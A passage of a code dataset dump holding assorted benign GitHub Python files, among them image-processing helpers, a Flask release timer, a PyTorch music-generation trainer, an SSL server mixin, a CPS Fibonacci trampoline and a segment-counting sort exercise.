range(gambar.shape[1]):\n hasil[i][j] = gambar[i][j][2]\n return hasil.astype(np.uint8)\n\n\ndef crop_gambar(gambar, x, y, w, h):\n return gambar[y:y + h, x:x + w].copy()\n\n\ndef operasi_and(gambar, mask):\n if gunakan_library:\n return cv2.bitwise_and(gambar, gambar, mask=mask)\n # mask values are 0 - 255\n hasil = np.zeros(gambar.shape)\n # the image can be grayscale or BGR\n # the mask can be grayscale or BGR\n # the image and the mask can be of different types\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n if len(gambar.shape) == 3:\n if len(mask.shape) == 3:\n hasil[i][j] = [gambar[i][j][0] & mask[i][j][0],\n gambar[i][j][1] & mask[i][j][1],\n gambar[i][j][2] & mask[i][j][2]]\n else:\n hasil[i][j] = [gambar[i][j][0] & mask[i][j],\n gambar[i][j][1] & mask[i][j],\n gambar[i][j][2] & mask[i][j]]\n else:\n if len(mask.shape) == 3:\n hasil[i][j] = [gambar[i][j] & mask[i][j][0],\n gambar[i][j] & mask[i][j][1],\n gambar[i][j] & mask[i][j][2]]\n else:\n hasil[i][j] = gambar[i][j] & mask[i][j]\n\n return hasil.astype(np.uint8)\n\n\ndef histogram_equalization(gambar):\n if gunakan_library:\n return cv2.equalizeHist(gambar)\n # without the library\n hasil = np.zeros(gambar.shape)\n hist = np.zeros(256)\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n hist[gambar[i][j]] += 1\n for i in range(1, 256):\n hist[i] += hist[i - 1]\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n hasil[i][j] = 255 * hist[gambar[i][j]] / (gambar.shape[0] * gambar.shape[1])\n return hasil.astype(np.uint8)\n\n\ndef filter_biru(img):\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n hue = img[i][j][0]\n sat = img[i][j][1]\n if 100 < hue < 130 or sat < 150:\n img[i][j] = [0, 0, 0]\n return img\n\n\ndef m_dilasi_grayscale(img, ukuran_kernel):\n if gunakan_library:\n kernel = np.ones((ukuran_kernel, ukuran_kernel), np.uint8)\n return cv2.dilate(img, kernel, iterations=1)\n # without the library\n hasil = np.zeros((img.shape[0], img.shape[1]))\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n maks = 0\n for k in range(-ukuran_kernel // 2, ukuran_kernel // 2 + 1):\n for l in range(-ukuran_kernel // 2, ukuran_kernel // 2 + 1):\n if 0 <= i + k < img.shape[0] and 0 <= j + l < img.shape[1]:\n maks = max(maks, img[i + k][j + l])\n hasil[i][j] = maks\n return 
hasil.astype(np.uint8)\n\n\nif __name__ == '__main__':\n # check bgr_hsv and hsv_bgr\n # to check whether the bgr_hsv and hsv_bgr functions are correct\n # the result must match the input\n input_bgr = [25, 25, 25]\n h, s, v = bgr_hsv(*input_bgr)\n print(input_bgr, [h, s, v])\n b, g, r = hsv_bgr(h, s, v)\n print(input_bgr, [b, g, r])\n\n # compare the result with OpenCV's built-in function\n bgr = np.array([[input_bgr]], dtype=np.uint8)\n hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)\n print(bgr, hsv)\n","repo_name":"sunarya-thito/sistem-penerjemah-lampu-lalu-lintas","sub_path":"modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":8167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9098992918","text":"import ctypes\nimport os\nimport sys\nimport threading\n\n\ndef _linux_gettid():\n \"\"\"Return system thread id or pid in single thread process\"\"\"\n return _libgettid.gettid()\n\n\ndef _universal_gettid():\n \"\"\"Give up and just use Python's threading ident\n\n Some platforms erroneously return None for the main thread's ident. This\n will return 0 instead.\n \"\"\"\n return threading.current_thread().ident or 0\n\n\nif 'linux' in sys.platform:\n try:\n _PATH = os.path.dirname(os.path.abspath(__file__))\n _libgettid = ctypes.cdll.LoadLibrary(\n os.path.join(_PATH, '_libgettid.so'))\n _libgettid.gettid.restype = ctypes.c_int\n _libgettid.gettid.argtypes = []\n except:\n gettid = _universal_gettid\n else:\n gettid = _linux_gettid\nelse:\n gettid = _universal_gettid\n","repo_name":"schmichael/mmstats","sub_path":"mmstats/libgettid.py","file_name":"libgettid.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"31"} +{"seq_id":"30440457624","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\nfrom numba import jit\n\n# %%\n# Values as given in the article synaptic theory of working memory\ntau_d = 0.2 # Sec\ntau_f = 1.5 # Sec\n\n\ndef simple_decay(val, time, tau):\n return (1 - val) / tau\n # Such models may make use of the time variable as well, this can be used\n # to model the effect of a spike, as well as to treat discretization\n\n\nt = np.linspace(0, 2, 101)\nval = 0\nsol_d = odeint(simple_decay, val, t, (tau_d,))\nsol_f = odeint(simple_decay, val, t, (-tau_f,))\n\n\nplt.figure()\nplt.plot(t * 1000, sol_d)\nplt.plot(t * 1000, sol_f)\nplt.xlabel('ms')\nplt.ylabel('fraction vesicles recovered')\n\n# finding first time instant when recovery is complete (99%)\nfirst_ms = t[np.isclose(sol_d[:, 0], 0.99, atol=0.001)][0] * 1000\nprint(first_ms)\n# if it takes \"first_ms\" seconds for the entire pool to replenish, given a pool size one can calculate the recovery time for a single vesicle\nnum_ves = 20\nves_recovery_time = first_ms / num_ves\nprint(ves_recovery_time)\n# %% prototyping the new release function\nduration = 500\nfreq = 15\ndt = 0.01\ninit_n = 0\ntau_n = 15\ntau_p = 1500\nmax_n = 20\ninit_p = 0\nbase_p = 0.15\ntimes = np.arange(0, duration, dt)\n\nspikes = np.random.rand(times.shape[0]) <= (freq * dt / 1000)\nspikes = times[spikes]\n\ndef test_d():\n n_t = np.zeros_like(times)\n p_t = np.zeros_like(times)\n r_t = np.zeros_like(times)\n n_t[0] = init_n\n p_t[0] = init_p\n\n for i, t in enumerate(times[1:-1]):\n # Find when vesicle pool started replenishment\n past_times = times <= t # Locate indexes of past time bins\n past_max_n_times = 
times[past_times][n_t[past_times] == max_n] # Look for times in the past when pool was full\n # Choose the latest of these times, if pool was never full, use beginning of experiment as reference\n if past_max_n_times.size == 0:\n time_since_max_n = t\n else:\n time_since_max_n = t - past_max_n_times[-1]\n\n # Calculate replenished\n replenished = 0 if n_t[i] == max_n else np.isclose(time_since_max_n % tau_n, 0).astype(int)\n\n # Calculate dp\n dp = -(p_t[i] / tau_p) + base_p * (t == spikes).any().astype(int) # p decays with tau_p and is bumped by base_p on a spike\n # Calculate p\n p_t[i + 1] = np.clip(p_t[i] + dp, 0, 1)\n # Calculate released\n # r_t[i] = np.round(p_t[i] * n_t[i])\n r_t[i] = (np.random.rand(int(n_t[i])) < p_t[i]).sum()\n # dn = replenished - released\n dn = replenished - r_t[i]\n n_t[i + 1] = n_t[i] + dn\n return n_t, p_t, r_t\n\n\nn_t, p_t, r_t = test_d()\n\nplt.figure()\nplt.subplot(311)\nplt.plot(times, p_t)\nplt.subplot(312)\nplt.plot(times, n_t)\nplt.subplot(313)\nplt.plot(times, r_t)\n\n\n\n","repo_name":"ronimb/temporal-coding","sub_path":"prototyping/mongillo_adjustments.py","file_name":"mongillo_adjustments.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12996342933","text":"# Create a list and a dictionary of your choice and, in them:\n\n# Print one chosen entry\n# Add an entry\n# Delete an entry\n# change an entry\n\n# Try out other list and dictionary functions: clear(), index(), insert(), remove...\n\n\n\nsarasas = ['labas', 'krabas', 'as', 'mes', 'tu', 'kartu']\nzodynas = {'namas':1994, 'gatve':5, 'pirmadienis':1, 'antradienis':2}\n\n# sarasas.append('noriu')\n# print(sarasas)\n\n# zodynas['treciadienis'] = 3\n# zodynas['ketvirtadienis'] = 4\n# print(zodynas)\n\n# istrinti = sarasas.pop(1)\n# print(sarasas)\n\n# del zodynas['namas']\n# print(zodynas)\n\n# sarasas[2] = 'as_ir_tu'\n# print(sarasas)\n\n# zodynas['namas'] = 2019\n# print(zodynas)\n\n# sarasas.clear()\n# print(sarasas)\n\n# zodynas.clear()\n# print(zodynas)\n\n# a = sarasas.index('as')\n# print(a)\n\n# sarasas.insert(-2, 'labukas')\n# print(sarasas)\n\n# sarasas.remove('tu')\n# print(sarasas)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"vuvusim/intro_kursas_ptu5","sub_path":"uzduotis_5.py","file_name":"uzduotis_5.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71311704087","text":"from CircleGuy import CircleGuy\nfrom Entity import Entity\nfrom Util import clamp\n\nclass Accelerator(Entity):\n \n def __init__(self, accFactor, minAcc, maxAcc):\n Entity.__init__(self)\n \n self.accFactor = accFactor\n self.minAcc = minAcc\n self.maxAcc = maxAcc\n \n def affectEntity(self, entity):\n if isinstance(entity, Accelerator):\n return\n if isinstance(entity, CircleGuy):\n return\n \n dist = self.pos.distance(entity.pos)\n \n accChange = 0.0\n if dist > 0.0:\n accChange = clamp((1.0/dist) * self.accFactor, self.minAcc, self.maxAcc)\n \n # make a vector pointing towards the accelerator\n towardsAcc = self.pos - entity.pos\n towardsAcc.normalize(1.0)\n \n # add some amount of acceleration to entity towards the accelerator\n # at a rate inverse to distance\n entity.acc += towardsAcc * 
accChange\n","repo_name":"bpeck/ProjectFuschiaFairy","sub_path":"src/gamelib/Accelerator.py","file_name":"Accelerator.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"8886396760","text":"from indictrans import Transliterator\nimport argparse\nfrom tqdm import tqdm\n\ndef transliterate(monofile,outfile, l1, l2):\n trn = Transliterator(source=l1,target=l2,build_lookup=True)\n with open(monofile) as f:\n lines = f.readlines()\n with open(outfile,'w') as w:\n for line in tqdm(lines):\n t13n = trn.transform(line)\n assert(len(t13n.split(\" \")) == len(line.split(\" \")))\n if not t13n.endswith('\\n'):\n t13n = t13n+'\\n'\n w.write(t13n)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--mono',type=str,help='Path to monolingual data')\n parser.add_argument('--outfile',type=str,help='Path to output file')\n parser.add_argument('--l1',type=str,help='Source Language')\n parser.add_argument('--l2',type=str,help='Target Language')\n args = parser.parse_args()\n transliterate(args.mono,args.outfile,args.l1,args.l2)\n","repo_name":"Vaidehi99/OBPE","sub_path":"transliterate_monolingual.py","file_name":"transliterate_monolingual.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"13311113280","text":"from sckg.etl.generic import Generic\n\nclass CSF800171(Generic):\n\n def __init__(self, config):\n super().__init__(config)\n\n def transform(self, regime, regime_list):\n stmts = []\n for control in regime_list:\n subcategory = control['_csf_subcategory']\n identifier = control.get('cui_requirement', None)\n if identifier:\n stmts.append(self.create_control_control_map(\n names={\n 'by_regime': True,\n 'csf_800_171': True,\n 'mapping_regime': 'NIST 800-171r2',\n 'mapped_regime': 'NIST CSF',\n 'mapping_control': identifier,\n 'mapped_control': subcategory,\n 'relationship': 'REFERSTO'\n },\n properties={'mapping': 'csf'}))\n\n return stmts","repo_name":"sckg/sckg","sub_path":"sckg/etl/csf_800_171r2.py","file_name":"csf_800_171r2.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"13361136521","text":"from datetime import (\n datetime,\n timedelta\n)\nfrom http import HTTPStatus\n\nfrom aiohttp import web\n\nfrom app.db_handler.schedule import select_schedule\n\nSECONDS_IN_WEEK = 604800\n\n\nasync def get_timer(request):\n \"\"\" Returns timestamp of next release. If release started returns also max delay. 
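For illustration (values made up, keys as returned by the handlers below): {\"timer_value\": 1600000000.0} before a release, or {\"timer_value\": 1600000000.0, \"timer_delay\": 30.0} once one has started. 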
\"\"\"\n\n with await request.app['redis'] as conn:\n timer_value = float((await conn.execute('get', 'timer_value')).decode('utf-8'))\n release_started = int((await conn.execute('get', 'release_started')).decode('utf-8'))\n timer_delay = float((await conn.execute('get', 'timer_delay')).decode('utf-8'))\n\n if release_started:\n return web.json_response({\n 'timer_value': timer_value,\n 'timer_delay': timer_delay})\n\n if timer_value and timer_value > datetime.now().timestamp():\n return web.json_response({'timer_value': timer_value})\n else:\n timer_next_release = await get_schedule_release_time(request.app)\n if timer_next_release:\n await conn.execute('set',\n 'timer_value',\n timer_next_release)\n\n return web.json_response({'timer_value': timer_next_release})\n else:\n return web.json_response({'errors:': 'Empty release schedule'})\n\n\nasync def update_timer(request):\n request_data = await request.json()\n\n try:\n timer_new_value = float(request_data.get('timer_value'))\n\n if timer_new_value > datetime.now().timestamp():\n with await request.app['redis'] as conn:\n await conn.execute('set',\n 'timer_value',\n timer_new_value)\n return web.Response()\n\n except (TypeError, ValueError):\n pass\n\n return web.json_response(\n {'errors': 'Invalid timer value'},\n status=HTTPStatus.BAD_REQUEST\n )\n\n\nasync def reset_timer(request):\n with await request.app['redis'] as conn:\n await conn.execute('set', 'timer_value', 0)\n return web.Response()\n\n\nasync def get_schedule_release_time(app):\n \"\"\" Returns timestamp of upcoming release. \"\"\"\n\n async with app['db'].acquire() as conn:\n schedule = await select_schedule(conn)\n\n now = datetime.now()\n min_diff = float('inf')\n\n for event in schedule:\n event_date = now + timedelta(days=event['day'] - (now.weekday() + 1))\n event_date = event_date.replace(hour=int(event['hour']), minute=int(event['minute']))\n\n diff = event_date.timestamp() - now.timestamp()\n if diff < 0:\n diff = SECONDS_IN_WEEK + diff\n\n if diff < min_diff:\n min_diff = diff\n\n return now.timestamp() + min_diff\n","repo_name":"pznkDev/Releaser","sub_path":"app/views/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43321751185","text":"\r\n\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 6 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\nimport numpy as np\r\nimport scipy.stats as st\r\nimport statsmodels.api as sm\r\nimport matplotlib.pyplot as plt \r\nimport pandas as pd \r\nfrom sklearn.datasets import load_iris\r\n\r\nplt.close('all')\r\n\r\niris = load_iris()\r\n# A copy from Sklearn\r\n\r\nX = iris.data\r\nx = X[:, 0]\r\ny = X[:, 1]\r\n\r\n\r\nxmin, xmax = 4, 8\r\nymin, ymax = 1, 5\r\n\r\n# Perform the kernel density estimate\r\nxx, yy = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]\r\npositions = np.vstack([xx.ravel(), yy.ravel()])\r\nvalues = np.vstack([x, y])\r\nkernel = st.gaussian_kde(values)\r\nPDF_xy = np.reshape(kernel(positions).T, xx.shape)\r\n\r\n\r\nfig, ax = plt.subplots(subplot_kw={'projection': '3d'})\r\n\r\nax.plot_wireframe(xx,yy, PDF_xy, \r\n rstride=4, cstride=4,\r\n color = [0.5,0.5,0.5],\r\n linewidth = 0.25)\r\n\r\n\r\ncolorbar = ax.contour(xx,yy, PDF_xy,20,\r\n cmap = 'RdYlBu_r')\r\n\r\nfig.colorbar(colorbar, ax=ax)\r\n\r\nax.set_xlabel('Sepal length, $X_1$')\r\nax.set_ylabel('Sepal 
width, $X_2$')\r\nax.set_zlabel('$f_{X1,X2}(x_1,x_2)$')\r\n\r\nax.set_proj_type('ortho')\r\n# ax.set_xticks([])\r\n# ax.set_yticks([])\r\n# ax.set_zticks([])\r\nax.view_init(azim=-135, elev=30)\r\nax.grid(False)\r\nax.set_xlim(xx.min(), xx.max())\r\nax.set_ylim(yy.min(), yy.max())\r\n# ax.set_zlim(0, 0.7)\r\nplt.tight_layout()\r\n\r\nplt.show()\r\n\r\n\r\nfig = plt.figure()\r\nax = fig.gca()\r\nax.set_xlim(xmin, xmax)\r\nax.set_ylim(ymin, ymax)\r\n\r\n# Contourf plot\r\ncfset = ax.contourf(xx, yy, PDF_xy, cmap='Blues')\r\ncset = ax.contour(xx, yy, PDF_xy, colors='k')\r\nplt.scatter(x,y,marker = 'x')\r\n\r\n# Label plot\r\nax.clabel(cset, inline=1, fontsize=10)\r\nax.set_xlabel('Sepal length, $X_1$')\r\nax.set_ylabel('Sepal width, $X_2$')\r\nplt.gca().set_aspect('equal', adjustable='box')\r\nplt.show()\r\n","repo_name":"Visualize-ML/Book5_Essentials-of-Probability-and-Statistics","sub_path":"Book5_Ch17_Python_Codes/Bk5_Ch17_04.py","file_name":"Bk5_Ch17_04.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1797,"dataset":"github-code","pt":"31"} +{"seq_id":"45939161624","text":"import json\nfrom pathlib import Path\n\nfrom create_music.linear_model import helper_functions\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torchvision import transforms\n\n\nfolder = Path('../music')\ndevice = 'cpu'\nsample_length = 32768\nmodel_name = 'music_creation'\nmetadata_file = 'lofi'\nconfig_file = Path(f'models/{metadata_file}/metadata{model_name}.json')\nepochs_to_run = 1600\nsave_every = 400\nsamplerate = 16000\n\ntransformations = transforms.transforms.Compose([\n transforms.transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n])\n\ntrain_loader = torch.utils.data.DataLoader(\n helper_functions.SongIngestion(Path(folder),\n length=sample_length,\n transformations=transformations,\n sr=samplerate),\n batch_size=16)\n\nif config_file.exists():\n with open(f'models/{metadata_file}/metadata{model_name}.json', 'r') as outfile:\n metadata = json.load(outfile)\n\n for key, value in metadata.items():\n if 'path' in value:\n model_path = value['path']\n starting_iteration = int(key)\n\n model = torch.load(model_path)\nelse:\n model = helper_functions.LinearNN(inputs=len(train_loader.dataset),\n final_length=sample_length)\n metadata = {}\n starting_iteration = 0\n\n\noptimizer = optim.SGD(model.parameters(), lr=0.05, momentum=0.9)\ncriterion = nn.L1Loss()\nmodel.to(device)\n\nsteps = 0\nrunning_loss = 0\ntrain_losses = []\ntest_losses = []\naccuracies = []\n\nfor epoch in range(epochs_to_run):\n running_loss = 0\n epoch = starting_iteration + epoch\n model.train()\n for results, inputs in train_loader:\n steps += 1\n inputs, results = inputs.to(device).float(), results.to(device)\n optimizer.zero_grad()\n logps = model(inputs)\n loss = criterion(logps.squeeze(1), results.type_as(logps))\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n train_losses.append(running_loss)\n print(f\"Epoch {epoch + 1}/{epochs_to_run + starting_iteration}.. \"\n f\"Train loss: {running_loss:.3f}.. 
\")\n\n save_path = f'models/{metadata_file}/music_creation_{model_name}_{epoch + 1}.pth'\n metadata[epoch + 1] = {\n 'running_loss': running_loss / len(train_loader.dataset),\n }\n\n if epoch % save_every == save_every - 1:\n Path(save_path).parent.mkdir(exist_ok=True, parents=True)\n metadata[epoch + 1]['path'] = save_path\n torch.save(model, save_path)\n\n with open(config_file, 'w') as outfile:\n json.dump(metadata, outfile)\n","repo_name":"EchoDel/data_science_experiments","sub_path":"create_music/linear_model/build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34885026263","text":"#from pydoc import help\nimport scipy\nfrom scipy.stats.stats import pearsonr\n\nfrom rpy2.robjects.packages import importr\nfrom rpy2.robjects.vectors import FloatVector\n\nstats = importr('stats')\n\nimport csv\n\nbase_dir = \"/Users/timrpeterson/OneDrive-v2/Data/MORPHEOME/FOR_PAPER/Figure2-introduce-morpheome/\"\n\nsql_tables = [\n\t\"intersect_HURI_depmap_2020q2_python.csv\",\n\t\"intersect_HURI_depmap_2019q4_python.csv\",\n\t\"intersect_HURI_depmap_qbf_Avanadata_2018_python.csv\",\n\t\"intersect_HURI_depmap_2019q2_python.csv\",\n\t\"intersect_HURI_Achilles_RNAi_python.csv\", \n\t\"intersect_bioplex_depmap_2020q2_python.csv\", \n\t\"intersect_bioplex_depmap_2019q4_python.csv\",\n\t\"intersect_bioplex_depmap_qbf_Avanadata_2018_python.csv\",\n\t\"intersect_bioplex_depmap_2019q2_python.csv\", \n\t\"intersect_bioplex_Achilles_RNAi_python.csv\", \n]\n\nppi_sig = {}\n\nfor file in sql_tables:\n\n\twith open(base_dir + file) as csv_file:\n\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\n\t\tfor row in csv_reader:\n\n\t\t\tgene_pair = row[0].split('-')\n\t\t\tgene_pair.sort()\n\n\t\t\tif gene_pair[0] == gene_pair[1]: continue\n\n\t\t\tgene_pair = gene_pair[0] + '-' + gene_pair[1]\n\n\t\t\tif gene_pair not in ppi_sig:\n\t\t\t\t\n\t\t\t\tppi_sig[gene_pair] = {'pearsons' : [row[1]], 'pval' : [row[2]]}\n\n\t\t\telse:\n\n\t\t\t\tppi_sig[gene_pair]['pearsons'].append(row[1])\n\t\t\t\tppi_sig[gene_pair]['pval'].append(row[2])\n\t\t\t\t\n\noutput2 = []\nfor key, value in ppi_sig.items():\n\n\t#if len(value[\"pearsons\"])!=len(genes)*len(datasets): continue\n\n\tp_adjust = stats.p_adjust(FloatVector(value[\"pval\"]), method = 'BH')\n\tpval = scipy.stats.stats.combine_pvalues(p_adjust)\n\n\tresult = (sum(value[\"pearsons\"])/len(value[\"pearsons\"]), pval[1])\n\n\toutput2.append(list((key,) + result)) \n\n#sort the output desc\noutput3 = sorted(output2, key=lambda x: x[1], reverse=True)\n\nwith open(base_dir + 'merge_ppi_depmap_data-python.csv', 'w') as csvfile:\n\tspamwriter = csv.writer(csvfile, delimiter='\\t')\n\n\tfor row in output3:\n\t\tspamwriter.writerow(row)\n\n\tcsvfile.close()","repo_name":"tim-peterson/morpheome_chpc_prep_data","sub_path":"py/figure2/merge_ppi_depmap_data.py","file_name":"merge_ppi_depmap_data.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35797544206","text":"import ssl\n\nclass SSLMixin:\n def __init__(self, *args, \n keyfile=None, certfile=None, ca_certs=None, cert_reqs=ssl.CERT_NONE,\n **kwargs):\n self._keyfile = keyfile\n self._certfile = certfile\n self._ca_certs = ca_certs\n self._cert_reqs = cert_reqs\n super().__init__(*args, **kwargs)\n\n def get_request(self):\n client, addr = super().get_request()\n client_ssl = 
ssl.wrap_socket(client,\n                          keyfile = self._keyfile,\n                          certfile = self._certfile,\n                          ca_certs = self._ca_certs,\n                          cert_reqs = self._cert_reqs,\n                          server_side = True)\n        return client_ssl, addr\n    \n    \n\n    \n    \n","repo_name":"dabeaz/python-cookbook","sub_path":"src/11/adding_ssl_to_network_servers/sslmixin.py","file_name":"sslmixin.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":3796,"dataset":"github-code","pt":"31"} +{"seq_id":"19684449585","text":"# Implement a function cipher that transforms each character of a given string as follows:\n# if the character is a lowercase letter, replace it with the character whose code is (219 - character code);\n# output every other character unchanged.\n# Use this function to encrypt and then decrypt an English message.\nimport string\n\n\ndef cipher(sentence):\n    alp = string.ascii_lowercase\n\n    return \"\".join([chr(219 - ord(letter)) if letter in alp else letter\n                    for letter in sentence])\n\n\nsentence = \" Float like a butterfly, die like a bee !! --Enrico Maxwell--\"\nprint(\"sentence = \\n\", sentence)\nprint(\"ciphered = \\n\", cipher(sentence))\n","repo_name":"cdlab-sit/100knock","sub_path":"Sota222/08_short.py","file_name":"08_short.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70561390488","text":"def fib_non_cps (n): # takes forever but hits no recursion depth error\n    return 1 if n < 2 else fib_non_cps(n-1) + fib_non_cps(n-2) # not tail recursive, because the recursion sits in operand positions\n\n# def fib_cps(n, k): # recursion depth error: max n = 12\n#     if n<2:\n#         return k(1)\n#     else:\n#         return fib_cps(n-1, lambda left: fib_cps(n-2, lambda right : k(left + right))) # the operand lies innermost; one lambda per recursive call\n    \n\ndef fib_cps(n, k): # fixes the recursion depth problem: every call returns a zero-argument thunk instead of recursing directly, so the trampoline below unwinds the calls iteratively and the stack never grows\n    if n < 2:\n        return k(1)\n    else:\n        return lambda: fib_cps(\n            n - 1,\n            lambda left:\n            lambda: fib_cps(\n                n - 2,\n                lambda right:\n                lambda: k(left + right)))\n    \ndef trampoline(f, *args):\n    v = f(*args)\n    while callable(v):\n        v = v()\n    return v\n    \nprint(trampoline(fib_cps, 30, lambda value: value))\n","repo_name":"CelinaO0o/CPS_Bachelor_Project","sub_path":"python/cpsfib.py","file_name":"cpsfib.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42192171850","text":"# from distutils.log import debug\nimport os\nimport model_load\nfrom flask import Flask, render_template, request\n\n\n\napp = Flask(__name__) \n\n\n@app.route(\"/\")\ndef home():\n    return render_template('index.html')\n\n@app.route('/success', methods = ['POST']) \ndef submission(): \n    if request.method == 'POST':\n        f = request.form.get('text_box')\n        f_path = f\n        p = model_load.predict_label(f_path)\n        return render_template(\"success.html\", prediction = p, f_path=f_path)\n    else: \n        return 'Something went wrong' \n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n\n","repo_name":"Saidkarim2000/Disaster-Sentence-Predictor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70145359768","text":"from tkinter import Tk, Canvas\nfrom PIL import Image, ImageTk\nfrom math import atan2, degrees\n\nroot = Tk()\ncanv = Canvas(root, width=800, height=600, background=\"white\")\ncanv.pack()\ncanv.update()\nw = canv.winfo_width()\nh = canv.winfo_height()\n\nmouseCoords = [w, h / 2]\narrowObj = 0\nangle = 0\n\nimg = Image.open(\"arrow.png\")\nimgTk = ImageTk.PhotoImage(img)\n\n\ndef updateAngle(x, y):\n
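    # math.atan2(dy, dx) picks the correct quadrant on its own, unlike atan(dy/dx),\n    # which is why the code below never needs to special-case dx == 0.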
    global angle\n    dy = (\n        y - h / 2\n    )  # considers the origin to be the middle of the screen and not (0,0) by offsetting\n    dx = x - w / 2\n    angle = atan2(dy, dx)  # atan2 takes in coords and returns an angle\n\n\ndef drawArrow():\n    global imgTk, arrowObj\n    imgTk = ImageTk.PhotoImage(\n        img.rotate(degrees(-angle))\n    )  # Negate the angle: screen y grows downwards, so atan2's angle is clockwise-positive, while img.rotate() turns counter-clockwise.\n    if arrowObj == 0:\n        arrowObj = canv.create_image(w / 2, h / 2, image=imgTk)\n    else:\n        canv.itemconfig(arrowObj, image=imgTk)\n    # Note: By using itemconfig, you can skip two steps:\n    # 1. Deleting objects\n    # 2. Updating Canvas\n    # (actually updating canvas from event causes recursion\n    # for some reason and causes the program to crash eventually)\n\n\ndef handleMouseEvent(event):\n    updateAngle(event.x, event.y)\n    drawArrow()\n\n\nroot.bind(\n    \"<Motion>\", handleMouseEvent\n)  # Whenever the mouse moves, handleMouseEvent is called\n\nroot.mainloop()\n","repo_name":"kertox662/PythonPackageInstaller","sub_path":"examples/PIL_Examples/MouseFollower/mouseFollower.py","file_name":"mouseFollower.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"34680492029","text":"\"\"\"\nThe first line contains two integers, 1 ≤ n ≤ 50000 and 1 ≤ m ≤ 50000:\nthe number of segments and the number of points on the line, respectively.\nEach of the next n lines contains two integers ai and bi, the coordinates of a segment's endpoints.\nThe last line contains m integers, the coordinates of the points.\nAll coordinates are at most 10^8 in absolute value.\nA point is considered to belong to a segment if it lies inside the segment or on its boundary.\nFor each point, in input order, output how many segments it belongs to.\n\"\"\"\n\nimport sys\n\n\ndef quick_sort_partition(arr, low, high):\n    if low >= high:\n        return arr\n    else:\n        random_index = (low + high) // 2\n        arr[low], arr[random_index] = arr[random_index], arr[low]\n        pivot_index = low + 1\n        equals_counter = 0\n        for i in range(low + 1, high + 1):\n            if arr[i] < arr[low]:\n                arr[pivot_index], arr[i] = arr[i], arr[pivot_index]\n                arr[pivot_index - equals_counter], arr[pivot_index] = arr[pivot_index], arr[\n                    pivot_index - equals_counter]\n                pivot_index += 1\n            elif arr[i] == arr[low]:\n                arr[pivot_index], arr[i] = arr[i], arr[pivot_index]\n\n                equals_counter += 1\n                pivot_index += 1\n        arr[low], arr[pivot_index - equals_counter - 1] = arr[pivot_index - equals_counter - 1], arr[low]\n        equals_counter += 1\n\n        less_high = pivot_index - equals_counter - 1\n        greater_low = pivot_index\n        arr = quick_sort_partition(arr, low, less_high)\n        arr = quick_sort_partition(arr, greater_low, high)\n\n        return arr\n\n\ndef binary_search_less(arr, elem_needed, low, high):\n    if low > high:\n        return low\n    else:\n        mid = (high + low) // 2\n        if elem_needed < arr[mid]:\n            high = mid - 1\n            return binary_search_less(arr, elem_needed, low, high)\n        elif elem_needed > arr[mid]:\n            low = mid + 1\n            return binary_search_less(arr, elem_needed, low, high)\n        else:\n            counter = 0\n            for i in range(mid, high + 1):\n                if arr[i] == elem_needed:\n                    counter += 1\n                else:\n                    break\n            return mid + counter\n\n\ndef binary_search_less_strictly(arr, elem_needed, low, high):\n    if low > high:\n        return 